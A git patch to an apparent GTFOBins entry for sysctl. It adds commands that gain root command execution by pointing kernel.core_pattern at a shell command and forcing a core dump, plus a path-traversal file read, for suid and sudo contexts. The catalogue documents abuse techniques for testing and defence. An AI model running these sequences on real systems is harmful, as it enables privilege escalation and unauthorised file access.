From 21e0166608d0c128a6cbab5b073d21c1b81cf297 Mon Sep 17 00:00:00 2001
From: decrazyo <decrazyo@gmail.com>
Date: Fri, 16 Dec 2022 10:12:13 -0600
Subject: [PATCH] Update sysctl

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
---
 _gtfobins/sysctl.md | 26 ++++++++++++++++++++------
 1 file changed, 20 insertions(+), 6 deletions(-)

diff --git a/_gtfobins/sysctl.md b/_gtfobins/sysctl.md
index cef069e..01c0bae 100644
--- a/_gtfobins/sysctl.md
+++ b/_gtfobins/sysctl.md
@@ -1,16 +1,30 @@
 ---
-description: The `-p` argument can also be used in place of `-n`. In both cases though the output might get corrupted, so this might not be suitable to read binary files.
 functions:
+  command:
+    - description: The command is executed by root in the background when a core dump occurs.
+      code: |
+        COMMAND='/bin/sh -c id>/tmp/id'
+        sysctl "kernel.core_pattern=|$COMMAND"
+        sleep 9999 &
+        kill -QUIT $!
+        cat /tmp/id
   file-read:
-    - code: |
+    - description: The `-p` argument can also be used in place of `-n`. In both cases though the output might get corrupted, so this might not be suitable to read binary files.
+      code: |
         LFILE=file_to_read
         /usr/sbin/sysctl -n "/../../$LFILE"
   suid:
     - code: |
-        LFILE=file_to_read
-        ./sysctl -n "/../../$LFILE"
+        COMMAND='/bin/sh -c id>/tmp/id'
+        ./sysctl "kernel.core_pattern=|$COMMAND"
+        sleep 9999 &
+        kill -QUIT $!
+        cat /tmp/id
   sudo:
     - code: |
-        LFILE=file_to_read
-        sudo sysctl -n "/../../$LFILE"
+        COMMAND='/bin/sh -c id>/tmp/id'
+        sudo sysctl "kernel.core_pattern=|$COMMAND"
+        sleep 9999 &
+        kill -QUIT $!
+        cat /tmp/id
 ---